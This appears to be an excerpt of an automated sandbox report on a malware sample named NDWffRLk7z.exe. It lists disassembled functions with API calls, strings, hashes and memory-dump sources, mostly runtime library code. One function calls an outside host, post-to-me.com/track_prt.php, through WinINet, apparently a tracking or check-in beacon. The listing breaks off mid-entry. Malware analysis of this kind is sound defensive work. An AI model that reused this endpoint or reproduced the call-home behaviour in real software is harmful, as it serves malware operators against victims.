SetLastError.KERNEL32(00000000,?,0211DACD), ref: 02142223
SetLastError.KERNEL32(00000000,?,0211DACD), ref: 0214222C

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: a983f62c3ff073bb4e608d98703bc712cce056cf543673d5ec360d857f53b7a0
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: 890149365C16007FC31627346C44F1B265EEBD2B72B610128FD2D92290EF7189428435

Function 00431F4E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
_free.LIBCMT ref: 00431F88
_free.LIBCMT ref: 00431FAF
SetLastError.KERNEL32(00000000), ref: 00431FBC
SetLastError.KERNEL32(00000000), ref: 00431FC5

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D

Function 02142131 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
_free.LIBCMT ref: 02142168
_free.LIBCMT ref: 02142190
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0214219D
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: d7f1d051a909470e374cae6615b1aa0bf9a94f6869f468e4c2b6784dfa428575
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: 72F0C8365C57013FD2263734AC08B1F266B9FC2F67F650224FE2C922D0EF718586896A

Function 00431ECA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
_free.LIBCMT ref: 00431F01
_free.LIBCMT ref: 00431F29
SetLastError.KERNEL32(00000000), ref: 00431F36
SetLastError.KERNEL32(00000000), ref: 00431F42

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D

Function 02127B77 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122994: TlsGetValue.KERNEL32(?,?,02120DB2,02122EBF,00000000,?,02120D90,?,?,?,00000000,?,00000000), ref: 0212299A

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02127BA1

Part of subcall function 0213120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02131231
Part of subcall function 0213120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0213124A
Part of subcall function 0213120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021312C0
Part of subcall function 0213120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021312C8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02127BAF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02127BB9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02127BC3
__CxxThrowException@8.LIBVCRUNTIME ref: 02127BE1

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction ID: 21a51a3f1fd6419cc12e573b524db468a777bb5a68588334f80e2567e5f36b43
Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction Fuzzy Hash: 0AF0F6316402386FCF26B7759810A6EF72B9F80B24B00412AF81153290DF359A2E8FC1

Function 00417910 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A

Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041797A

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD

Function 0214A09C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0214A0B4

Part of subcall function 021436C1: HeapFree.KERNEL32(00000000,00000000,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?), ref: 021436D7
Part of subcall function 021436C1: GetLastError.KERNEL32(?,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?,?), ref: 021436E9

_free.LIBCMT ref: 0214A0C6
_free.LIBCMT ref: 0214A0D8
_free.LIBCMT ref: 0214A0EA
_free.LIBCMT ref: 0214A0FC

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: cd6cd29dd3afbd5e11ee4e9c54fcbca92b9406afc588a17c95bb0e403610ebc1
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 95F062729C9301AB8720EB54F8C2C0A77DAAF047147650945F12CDBB21CF31F8908E99

Function 00439E35 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E4D

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 00439E5F
_free.LIBCMT ref: 00439E71
_free.LIBCMT ref: 00439E83
_free.LIBCMT ref: 00439E95

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D

Function 0212CF1C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0212CF26
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0212CF57
GetCurrentThread.KERNEL32 ref: 0212CF60
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0212CF73
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0212CF7C

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: e1b1e72d78dec333cb4b568b8bbf3502c29671c4a13c6dbe14c934a3f2437470
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 88F082362806209FCB29EF60F9508AF73769FC4610311055DF59606550CF25A92ADB61

Function 0041CCB5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
GetCurrentThread.KERNEL32 ref: 0041CCF9
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A

Function 02112E61 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02112E84

Part of subcall function 02111321: _wcslen.LIBCMT ref: 02111328
Part of subcall function 02111321: _wcslen.LIBCMT ref: 02111344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02113097

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 02112EB4, 02112FE0, 0211304F
&cc=DE, xrefs: 02113011, 02113017, 02113074

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
Instruction ID: 0fdef07ba15819a6c91864109e7afe034b059c51cbd8dfbb1f4e2c7daea4f768
Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
Instruction Fuzzy Hash: 66516295A65344A9E320EFB0BC55B3633B8FF58712F10543AE528CB2B2E7B1D944871E

Function 0043430B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479

Strings

BC, xrefs: 00434386
BC, xrefs: 00434473

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: BC$BC
API String ID: 885266447-2490606219
Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44

Function 0213F96F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NDWffRLk7z.exe,00000104), ref: 0213F9AA
_free.LIBCMT ref: 0213FA75
_free.LIBCMT ref: 0213FA7F

Strings

C:\Users\user\Desktop\NDWffRLk7z.exe, xrefs: 0213F9A1, 0213F9A8, 0213F9D7, 0213FA0F

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\NDWffRLk7z.exe
API String ID: 2506810119-1672007949
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 7ca6095582a42b6c207b8edda6727a87f47adef8d4e5be1a8ff5e189bdaacaa3
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 84318571E84258EFDB22DF99DC84D9EBBFEEF89710B104066E80597221D7709A45CB50

Function 0042F708 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NDWffRLk7z.exe,00000104), ref: 0042F743
_free.LIBCMT ref: 0042F80E
_free.LIBCMT ref: 0042F818

Strings

C:\Users\user\Desktop\NDWffRLk7z.exe, xrefs: 0042F73A, 0042F741, 0042F770, 0042F7A8

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\NDWffRLk7z.exe
API String ID: 2506810119-1672007949
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99

Function 02149362 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

Part of subcall function 02149481: _free.LIBCMT ref: 021494E7

Part of subcall function 021490F6: GetOEMCP.KERNEL32(00000000), ref: 02149121

_free.LIBCMT ref: 021493DA
_free.LIBCMT ref: 02149410

Strings

(], xrefs: 02149459
(], xrefs: 02149454

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: (]$(]
API String ID: 3291180501-2757348372
Opcode ID: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
Instruction ID: eee50c1df37134c0520fc0f7cc8b790616f81529098598bc934567147071cca1
Opcode Fuzzy Hash: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
Instruction Fuzzy Hash: 49310831940208AFDB10DF69D484B9FB7F6EF41328F25419AE9189B2A1EF719D41CF40

Function 004390FB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 0043921A: _free.LIBCMT ref: 00439280

Part of subcall function 00438E8F: GetOEMCP.KERNEL32(00000000), ref: 00438EBA

_free.LIBCMT ref: 00439173
_free.LIBCMT ref: 004391A9

Strings

(], xrefs: 004391ED
(], xrefs: 004391F2

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$ErrorLast
String ID: (]$(]
API String ID: 3291180501-2757348372
Opcode ID: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
Instruction ID: 9b14abf3bf2fe7e14eb2dcc81dfa465f84d4fb680b36cf54f8426df5d89ca735
Opcode Fuzzy Hash: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
Instruction Fuzzy Hash: AD31F531904209AFEF10EFA9D445A6AB7F1EF48325F20119FE404AB3A1DB7A9D41CB48

Function 0211C875 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0211C8D4

Strings

ios_base::failbit set, xrefs: 0211C8A1
ios_base::eofbit set, xrefs: 0211C8A6
ios_base::badbit set, xrefs: 0211C897, 0211C8B7

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction ID: 5e2566f3e728e2031876d3dfd4ceaf95d1ed66d72b228b8890851e1b6f80735f
Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction Fuzzy Hash: 49F02B73CC06086ECB04EA58CC81BFE33985B41345F048077EE516A0C2F7789905CBD6

Function 00428DBC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: <(@
API String ID: 3213686812-4189137628
Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD

Function 0042FA0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 004394FD: GetEnvironmentStringsW.KERNEL32 ref: 00439501

_free.LIBCMT ref: 0042FA4F
_free.LIBCMT ref: 0042FA56

Strings

^X, xrefs: 0042FA41
^X, xrefs: 0042FA0E, 0042FA3C

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$EnvironmentStrings
String ID: ^X$^X
API String ID: 3523873077-3064781418
Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction ID: 08707e55e404d2c76e2f6eae856c7126cd4318a61dcb705a42d68a92314f0541
Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction Fuzzy Hash: 0EE0ED12F0592142E632B63B3C02A6A06144B8177EFD0423FE828D61C2DE6C880B029F

Function 0042DF6D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC, 0040F1DD

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: <(@
API String ID: 3213686812-4189137628
Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD

Function 004242B7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
__CxxThrowException@8.LIBVCRUNTIME ref: 00424309

Strings

pScheduler, xrefs: 004242F3

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D

Function 0041E60D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E650

Strings

pContext, xrefs: 0041E63A

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC

Function 00415D7A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8

Strings

pScheduler, xrefs: 00415DA2
version, xrefs: 00415D8F

Memory Dump Source

